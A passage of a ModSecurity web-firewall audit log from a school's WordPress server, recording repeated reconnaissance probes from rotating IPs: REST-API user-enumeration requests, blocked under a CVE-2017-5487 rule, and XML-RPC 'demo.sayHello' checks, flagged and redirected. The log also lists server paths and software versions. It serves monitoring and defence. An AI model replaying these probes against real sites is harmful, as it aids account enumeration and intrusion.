ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb49aa2c-Z-- --61883f3c-A-- [17/May/2025:07:17:16 +0700] aCfVjBKi5m5upc8uMd6huQAAAME 103.236.140.4 42614 103.236.140.4 8181 --61883f3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.4 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --61883f3c-C-- demo.sayHello --61883f3c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --61883f3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441036417720 6644 (- - -) Stopwatch2: 1747441036417720 6644; combined=4707, p1=603, p2=3863, p3=37, p4=41, p5=97, sr=79, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61883f3c-Z-- --a06bd874-A-- [17/May/2025:07:17:33 +0700] aCfVnem4kjNN-hEbWjJAsAAAAFE 103.236.140.4 42618 103.236.140.4 8181 --a06bd874-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a06bd874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a06bd874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441053002533 3332 (- - -) Stopwatch2: 1747441053002533 3332; combined=1394, p1=460, p2=904, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a06bd874-Z-- --b2721969-A-- [17/May/2025:07:17:34 +0700] aCfVnhKi5m5upc8uMd6hugAAAMQ 103.236.140.4 42620 103.236.140.4 8181 --b2721969-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2721969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2721969-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441054762131 2868 (- - -) Stopwatch2: 1747441054762131 2868; combined=1271, p1=439, p2=803, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2721969-Z-- --f99c460d-A-- [17/May/2025:07:17:39 +0700] aCfVo3yxdQCiyU1ENFcmxwAAABA 103.236.140.4 42626 103.236.140.4 8181 --f99c460d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f99c460d-C-- demo.sayHello --f99c460d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f99c460d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441059262955 5080 (- - -) Stopwatch2: 1747441059262955 5080; combined=3852, p1=468, p2=3170, p3=22, p4=26, p5=96, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f99c460d-Z-- --2f07201a-A-- [17/May/2025:07:17:40 +0700] aCfVpHyxdQCiyU1ENFcmyAAAABE 103.236.140.4 42628 103.236.140.4 8181 --2f07201a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f07201a-C-- demo.sayHello --2f07201a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f07201a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441060102598 5336 (- - -) Stopwatch2: 1747441060102598 5336; combined=4065, p1=503, p2=3349, p3=29, p4=32, p5=90, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f07201a-Z-- --cc24db41-A-- [17/May/2025:07:18:40 +0700] aCfV4BKi5m5upc8uMd6huwAAAMM 103.236.140.4 42636 103.236.140.4 8181 --cc24db41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cc24db41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc24db41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441120967532 2664 (- - -) Stopwatch2: 1747441120967532 2664; combined=1127, p1=367, p2=737, p3=0, p4=0, p5=23, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc24db41-Z-- --41f0927f-A-- [17/May/2025:07:18:50 +0700] aCfV6hKi5m5upc8uMd6hvAAAAMU 103.236.140.4 42640 103.236.140.4 8181 --41f0927f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --41f0927f-C-- demo.sayHello --41f0927f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --41f0927f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441130951777 6131 (- - -) Stopwatch2: 1747441130951777 6131; combined=4384, p1=636, p2=3517, p3=30, p4=37, p5=97, sr=137, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41f0927f-Z-- --80e79400-A-- [17/May/2025:07:19:02 +0700] aCfV9um4kjNN-hEbWjJAtQAAAFg 103.236.140.4 42644 103.236.140.4 8181 --80e79400-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --80e79400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80e79400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441142460789 2598 (- - -) Stopwatch2: 1747441142460789 2598; combined=1051, p1=366, p2=663, p3=0, p4=0, p5=22, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e79400-Z-- --4c820b31-A-- [17/May/2025:07:19:07 +0700] aCfV--m4kjNN-hEbWjJAtgAAAEI 103.236.140.4 42646 103.236.140.4 8181 --4c820b31-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4c820b31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c820b31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441147653966 2807 (- - -) Stopwatch2: 1747441147653966 2807; combined=1241, p1=438, p2=774, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c820b31-Z-- --34876255-A-- [17/May/2025:07:19:10 +0700] aCfV_gTOsBn9MSWb6WJt5gAAAIo 103.236.140.4 42652 103.236.140.4 8181 --34876255-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.234 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --34876255-C-- demo.sayHello --34876255-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --34876255-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441150186227 5032 (- - -) Stopwatch2: 1747441150186227 5032; combined=3807, p1=501, p2=3096, p3=21, p4=23, p5=96, sr=119, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34876255-Z-- --0fdeea48-A-- [17/May/2025:07:19:14 +0700] aCfWAhKi5m5upc8uMd6hvQAAAMY 103.236.140.4 42654 103.236.140.4 8181 --0fdeea48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0fdeea48-C-- demo.sayHello --0fdeea48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fdeea48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441154476487 6225 (- - -) Stopwatch2: 1747441154476487 6225; combined=4388, p1=563, p2=3585, p3=31, p4=35, p5=102, sr=81, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fdeea48-Z-- --2db1be19-A-- [17/May/2025:07:20:19 +0700] aCfWQ3yxdQCiyU1ENFcmywAAABQ 103.236.140.4 42662 103.236.140.4 8181 --2db1be19-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2db1be19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2db1be19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441219650848 3272 (- - -) Stopwatch2: 1747441219650848 3272; combined=1431, p1=500, p2=900, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db1be19-Z-- --5bbb6d18-A-- [17/May/2025:07:20:24 +0700] aCfWSBKi5m5upc8uMd6hvgAAAMc 103.236.140.4 42666 103.236.140.4 8181 --5bbb6d18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.14 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5bbb6d18-C-- demo.sayHello --5bbb6d18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bbb6d18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441224953582 4952 (- - -) Stopwatch2: 1747441224953582 4952; combined=3836, p1=469, p2=3142, p3=28, p4=27, p5=99, sr=68, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bbb6d18-Z-- --0928df33-A-- [17/May/2025:07:20:39 +0700] aCfWV3yxdQCiyU1ENFcmzgAAAAE 103.236.140.4 42680 103.236.140.4 8181 --0928df33-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0928df33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0928df33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441239656342 2911 (- - -) Stopwatch2: 1747441239656342 2911; combined=1254, p1=437, p2=788, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0928df33-Z-- --56a2132c-A-- [17/May/2025:07:20:48 +0700] aCfWYHyxdQCiyU1ENFcm0AAAAAM 103.236.140.4 42684 103.236.140.4 8181 --56a2132c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --56a2132c-C-- demo.sayHello --56a2132c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --56a2132c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441248905849 5870 (- - -) Stopwatch2: 1747441248905849 5870; combined=4235, p1=555, p2=3418, p3=33, p4=35, p5=125, sr=79, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56a2132c-Z-- --76ba9432-A-- [17/May/2025:07:21:07 +0700] aCfWc3yxdQCiyU1ENFcm0gAAAAU 103.236.140.4 42688 103.236.140.4 8181 --76ba9432-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76ba9432-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ba9432-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441267189622 2826 (- - -) Stopwatch2: 1747441267189622 2826; combined=1278, p1=425, p2=824, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ba9432-Z-- --fa081e7e-A-- [17/May/2025:07:21:12 +0700] aCfWeHyxdQCiyU1ENFcm1AAAAAg 103.236.140.4 42692 103.236.140.4 8181 --fa081e7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa081e7e-C-- demo.sayHello --fa081e7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa081e7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri 